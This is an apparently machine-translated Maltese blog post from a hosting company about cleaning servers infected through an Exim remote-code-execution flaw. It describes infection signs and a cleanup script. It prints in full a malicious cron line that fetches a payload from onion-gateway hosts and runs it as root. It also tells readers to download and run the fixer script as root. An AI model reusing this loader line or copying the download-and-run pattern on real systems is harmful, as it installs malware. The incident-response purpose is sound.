ProHoster > blog > Amministrazzjoni > L-ewwel mewġa ta 'vittmi tal-vulnerabbiltà Exim. Skript għat-trattament

L-ewwel mewġa ta 'vittmi tal-vulnerabbiltà Exim. Skript għat-trattament

Vulnerabbiltà RCE f'Exim diġà kkawża ħawwad mhux ħażin u ħarġet serjament in-nervituri tal-amministraturi tas-sistema madwar id-dinja.

Wara infezzjonijiet tal-massa (ħafna mill-klijenti tagħna jużaw Exim bħala server tal-posta), malajr għaqqadt kitba biex awtomat is-soluzzjoni għall-problema. L-iskript huwa 'l bogħod mill-ideali u mimli kodiċi mhux ottimali, iżda hija soluzzjoni ta' ġlieda ta 'malajr biex tevita li twettaq l-istess azzjonijiet fuq mijiet jew saħansitra eluf ta' servers.

Jaħdem fuq servers b'OS Centos, RHEL, Debian, Ubuntu jekk għandek installat server tal-posta Exim.

Kif tifhem li s-server huwa hacked?

Iċċekkja l-proċessi li qed jaħdmu bl-ogħla kmand.
Servers infettati jesperjenzaw tagħbija 100% mill-proċess [kthrotlds]. Ukoll, kompitu bi drittijiet ta 'editjar ristretti huwa miżjud mal-cron scheduler.

Taqsima Twissijiet

L-inċidenti kollha ta' infezzjoni li ltqajna magħhom kienu assolutament identiċi; it-tieni u t-tielet mewġ jistgħu jkunu differenti, u l-iskritt jista' jkollu bżonn jiġi modifikat għalihom. Fil-ħin tal-infezzjoni, ix-xogħlijiet cron jintilfu b'mod irrevokabbli u jridu jiġu restawrati manwalment. L-iskritt jieħu azzjoni immedjata—jaġġorna Exim bla biża' għal verżjonijiet imwaħħla, fil-każ ta' Centos 6 anke mir-repożitorju tat-test. L-istanza tal-malware tinsab fil-memorja, għalhekk is-server kun żgur Għandek bżonn terġa 'tibda immedjatament wara t-tindif tal-kuruni.

Importanti: Il-vulnerabbiltà tippermetti li l-kodiċi jiġi esegwit bħala għerq, li ma jipprovdi l-ebda garanzija ta 'kura ta' 100%. B'aċċess għerq għal server, tista 'taħbi kważi kull ħaġa fuq dak is-server, sabiex ikun kważi impossibbli li ssibha. L-uniku mod biex tiggarantixxi kura sħiħa għal server huwa li twettaq installazzjoni mill-ġdid kompluta, iżda dan mhux dejjem ikun possibbli. Jekk ma jkun hemm l-ebda possibbiltà li jerġa 'jinstalla s-server, u s-sintomi jaqblu ma' dawk deskritti, tista 'tipprova twaħħal it-toqob malajr b'din l-iskrittura.

Billi tuża l-iskrittura, tagħmel dan għar-riskju tiegħek: aħna ttestjajna l-iskript fuq numru ta' servers, iżda dejjem hemm riskji ta' inkompatibbiltà ta' verżjonijiet tas-softwer jew settings konfliġġenti.
Ukoll, l-iskrittura tagħna tippermettilna tfejjaq waħda biss mill-implimentazzjonijiet possibbli ta 'infezzjoni - huwa possibbli li diġà hemm modi oħra ta' sfruttament tal-vulnerabbiltà li ma ġewx għall-attenzjoni tagħna.

X'tagħmel l-iskrittura?

1. Jekk is-sistema operattiva installata fuq is-server:

  • Nru Centos 6 aġġornamenti ta' Exim, jerġa' jinstalla curl.
  • Centos 6 — jaġġorna Exim mir-repożitorju tat-test tal-EPEL (ir-rilaxx għar-repożitorji standard huwa mistenni fil-11-12.06), jerġa' jinstalla curl.

2. Kontrolli għal infezzjoni fuq is-server.

L-iskrittura tanalizza l-ħidmiet tal-iskedar għal inklużjonijiet suspettużi.Per eżempju, dawn:

*/11 * * * * root tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && wget="$f" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi;  (${curl}  -fsSLk --retry 2 --connect-timeout 22 --max-time 75  https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -o /.cache/.ntp||${curl}  -fsSLk --retry 2 --connect-timeout 22 --max-time 75  https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -o /.cache/.ntp||${curl}  -fsSLk --retry 2 --connect-timeout 22 --max-time 75  https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -o /.cache/.ntp||${wget}  --quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=22 --timeout=75  https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -O /.cache/.ntp||${wget}  --quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=22 --timeout=75  https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -O /.cache/.ntp||${wget}  --quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=22 --timeout=75  https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -O /.cache/.ntp) && chmod +x /.cache/.ntp && /bin/sh /.cache/.ntp

2a. Jekk hemm traċċi ta' skript tal-virus fil-folder /etc, agħmel dan li ġej

  • jieqaf cron
  • joqtol il-proċess imniedi mill-iskript tal-virus
  • joqtol il-proċessi curl wget sh erba 'darbiet (immexxi mill-virus fl-iskeda)
  • ineħħi l-kju tal-posta mill-ittri kollha (ittri infettati huma diffiċli biex jiġu separati minn dawk li ma jagħmlux ħsara, għalhekk trid tħassar il-kju kollu)
  • Jippermetti t-tħassir ta' fajls li fihom frammenti ta' skript malizzjuż:
    /etc/cron.daily/cronlog
/etc/cron.d/root
/etc/cron.d/.cronbus
/etc/cron.hourly/cronlog
/etc/cron.monthly/cronlog
/var/spool/cron/root
/var/spool/cron/crontabs/root
/etc/cron.d/root
/etc/crontab
/root/.cache/
/root/.cache/a
/usr/local/bin/nptd
/root/.cache/.kswapd
/usr/bin/[kthrotlds]
/root/.ssh/authorized_keys
/.cache/*
/.cache/.sysud
/.cache/.a
/.cache/.favicon.ico
/.cache/.kswapd
/.cache/.ntp
  • iħassar dawn il-fajls
  • ineħħi l-kompitu tal-awtostart f'/etc/rc.local
  • tneħħi ċ-ċavetta tal-attakkant miċ-ċwievet ssh permessi
  • runs cron
  • u immedjatament reboot-server

2b. Jekk ma jkunx hemm traċċi ta 'infezzjoni, l-iskrittura jintemm.

Kjarifiki

Il-virus iħassar il-kompiti kollha tal-cron scheduler. Għalhekk, wara li jerġa 'jibda s-server, jeħtieġ li jiġu kkonfigurati mill-ġdid jew restawrati minn backup.

curl tiġi infettata wkoll b'virus, u għalhekk terġa 'tiġi installata.

Il-booting mill-ġdid (l-iskript jagħmel dan awtomatikament wara t-trattament) huwa obbligatorju - inkella l-malware jibqa 'fil-memorja tas-server u jirriproduċi ruħu kull 30 sekonda anki wara li tħassar il-fajls infettati.

Kif tuża?

Tradizzjonalment, qabel tibda, kun żgur li għandek backup aġġornata tad-dejta tas-server tiegħek.

Biex tmexxi l-iskript:

Qabbad mas-server permezz ta' ssh bħala utent bi drittijiet tal-għeruq. Tista 'wkoll tuża l-klijent Shell fil-pannell ISPmanager - Għodod.

Fit-terminal, daħħal il-kmand:

wget https://lechillka.firstvds.ru/exim_rce_fixer.sh && chmod +x exim_rce_fixer.sh && ./exim_rce_fixer.sh

Stenna li l-iskript jitlesta u s-server jerġa 'jibda.

Wara li terġa 'tibda, iċċekkja l-operat tas-server u s-siti/applikazzjonijiet ospitati fuqu, ikkonfigura mill-ġdid jew irrestawra l-kompiti cron mill-backup.

U finalment

Essenzjalment, l-iskrittura hija soluzzjoni temporanja biex tirrestawra l-funzjonalità tas-server, għal prevenzjoni garantita, l-aħjar soluzzjoni hija li taqleb għal server ġdid b'verżjoni tas-sistema operattiva li m'għadhiex fiha l-vulnerabbiltà.

Ir-rakkomandazzjonijiet kollha għat-titjib/ħidma mill-ġdid tal-iskritt huma milqugħa. Jekk iltqajt ma' sintomu ieħor ta' infezzjoni, jekk jogħġbok urih. Il-kooperazzjoni fi żminijiet ta' infezzjonijiet tal-massa tnaqqas b'mod sinifikanti l-ħin meħtieġ biex jiġu eliminati dawn l-infezzjonijiet.

Xorti tajba!

UPD1: Miżjud ma 'github.
I uploaded il-kodiċi tas-sors tal-iskript malware hemmhekk, li rnexxieli niġbed mis-server infettat.

Sors: www.habr.com

Ixtri hosting affidabbli għal siti bi protezzjoni DDoS, servers VPS VDS 🔥 Ixtri hosting ta' websajts affidabbli bi protezzjoni DDoS, servers VPS VDS | ProHoster